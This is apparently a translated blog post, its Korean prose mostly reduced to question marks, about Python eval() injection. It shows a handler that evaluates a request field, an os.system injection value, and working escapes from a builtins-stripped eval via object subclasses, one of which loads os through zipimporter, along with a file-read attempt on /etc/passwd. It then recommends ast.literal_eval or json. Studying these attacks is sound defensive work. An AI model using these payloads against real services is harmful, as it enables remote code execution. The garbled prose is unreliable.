? ?? Python eval? ???? ?? ??? ? ?? ??? ?????. ??? ??? ??? ? ??? ????.
?? ?? ?? ???? eval? ??? ???? ?? ?? ??? ?? ??? ??? ??????. ???? ??? eval? ?? ???? ???? ??? ??? eval? ?? ????? ????. ?? ??? ???? ? ??? ??? ??? ? ????. ??? ??? ??? ? ? ??? ???? ???.
??? ?? ??? ?????. ??? ??? [bug83055][1]? ?????.
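def remove(request, obj):
    """Dispatch a POST request to the operation named by its ``oper_type`` field.

    NOTE(security): ``oper_type`` comes straight from the request body and is
    passed to ``eval()``, so whoever sends the request chooses the expression
    the server evaluates. This is the vulnerable pattern; resolve the handler
    from a fixed allow-list (a dict of name -> function) instead of
    evaluating request data.
    """
    query = query2dict(request.POST)
    # NOTE(review): ``customer_obj`` is not defined in this excerpt (the
    # parameter is ``obj``) -- confirm which name the handler should receive.
    # UNSAFE: evaluates a client-supplied string to obtain the callable.
    eval(query['oper_type'])(query, customer_obj)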
??? POST?? ?? ???? ???? oper_type=__import__(? ???? ?? ??? ? ????. URL ???? 'os').system('sleep 5')?? sleep ??? ??? ? ????. ?? ?? ??? ???? ?? ??? ??? ??? ? ????. ??? ????? ???? ???????. ??? ??? ???? ?? ??? ??? ??????
1. ?? ? ?
??? ??? ???? ???? ????.
>>> eval('2+2') 4 >>> eval("""{'name':'xiaoming','ip':'10.10.10.10'}""") {'ip': '10.10.10.10', 'name': 'xiaoming'} >>> eval("__import__('os').system('uname')", {}) Linux 0
? ? ?? ??? ? ? ? ?? ??? ??? ??? ???? ? ?? ??? ??? ??? ???? Python ??? ???? ?????. . ??? dict? ???, ?? ?? ???? ?? ???? ????? ???. ? ??? ?? ??? ?? ?, ? ??? ??? ???? ????.
eval? eval(source[, globals[, locals]]) -> value
globals? ???? ?? locals? ?-? ???? ???. ???? ??? ?? ? locals
???. 2, ??? ???
(1) ?? ?? ?? ? ??? ??? ??? ????? [??][2]? ????? ????? ??? ??? ?? ??? ??? ???. ?:
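def safe_eval(eval_str):
    """Evaluate *eval_str* with builtins removed and only True/False bound.

    Returns the value of the expression, or '' if evaluation raises (the
    traceback is printed).

    NOTE(security): despite the name this is not a sandbox. Clearing
    ``__builtins__`` only hides names such as ``__import__``; an expression
    can still reach other loaded classes through attribute access on a
    literal. For untrusted input use ``ast.literal_eval`` or ``json.loads``.
    """
    try:
        # Build the restricted namespace the expression may see.
        safe_dict = {}
        safe_dict['True'] = True
        safe_dict['False'] = False
        return eval(eval_str, {'__builtins__': None}, safe_dict)
    except Exception:
        # Best-effort: report the failure and hand back an empty string.
        traceback.print_exc()
        return ''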
Here __builtins__ ??? ??????? __import__? ?? ?? ??? ??????. ? ???? ??? ?????? ???? ???????:
>>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
__builtins__?? ?? ??? OS? ?? ??? ???? ? ??? ? ?? __import__? ??? ??? ? ????. ???? ??? ? eval ??? ???? ??? ??? ????.
>>> eval("__import__('os').system('uname')", {'__builtins__':{}}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<string>", line 1, in <module> NameError: name '__import__' is not defined
?? __import__? ???? ?? ????? ??? ? ??? ???? ?????. ??? ??? ???.
?? ?? ??? ??? ????.
>>> s = """ ... (lambda fc=( ... lambda n: [ ... c for c in ... ().__class__.__bases__[0].__subclasses__() ... if c.__name__ == n ... ][0] ... ): ... fc("function")( ... fc("code")( ... 0,0,0,0,"test",(),(),(),"","",0,"" ... ),{} ... )() ... )() ... """ >>> eval(s, {'__builtins__':{}}) Segmentation fault (core dumped)
??? ???? ??? ?????. ? ?? ??? segfault? ?? ??????.
?? ??? ?????? ?????.
>>> >>> s = """ ... [ ... c for c in ... ().__class__.__bases__[0].__subclasses__() ... if c.__name__ == "Quitter" ... ][0](0)() ... """ >>> eval(s,{'__builtins__':{}}) liaoxinxi@RCM-RSAS-V6-Dev ~/tools/auto_judge $
?? ????? ?? ?? ??:
>>> ().__class__.__bases__[0].__subclasses__() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'Struct'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>]
??? Python ??? ??? Tuple? ???? ?? ?? ?? ?? ???? ??? ?? ?? ??? ?? ?? ?? ???? ?? ????. ?? ?? ???? ??? ??? ?????. ?? ??? zipimporter ??? ??? ?? ? ? ????. ?? ??? ?????
???? ???? ??:
>>> s1 = """ ... [ ... c for c in ... ().__class__.__bases__[0].__subclasses__() ... if c.__name__ == "file" ... ][0]("/etc/passwd").read()() ... """ >>> eval(s1,{'__builtins__':{}}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<string>", line 6, in <module> IOError: file() constructor not accessible in restricted mode
? ?? ??? ??? Python ?????? ????? ?????. ???? ??? ? ?? ?? ??? ??? ??? ? ?? ? ?? ??? ?????. ??? ??? ??? ?? ??, ?? ???? ??? ?????. ?? ??? ??? os ??? ???? ?? ?? ??? ?? ??? ? ??? ??????.
>>> s2=""" ... [x for x in ().__class__.__bases__[0].__subclasses__() ... if x.__name__ == "zipimporter"][0]( ... "/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module( ... "configobj").os.system("uname") ... """ >>> eval(s2,{'__builtins__':{}}) Linux 0
??? ??? safe_eval? ??? ???? ??? ?? ?????.
3. ???? ???? ??
(1) ast.literal_eval? ?????
(2) ??? dict? ??? ?? json ??? ??? ? ????
? ?? ??????, ?? ?? ? ???????. , PHP ??? ????? python ??? ???? ??? ??? ???!
? ??? Python ??? ???? ?? ??? ? ?? ?? ??? ?? ?????. ??? ??? PHP ??? ????? ?? ?? ??? ?????!

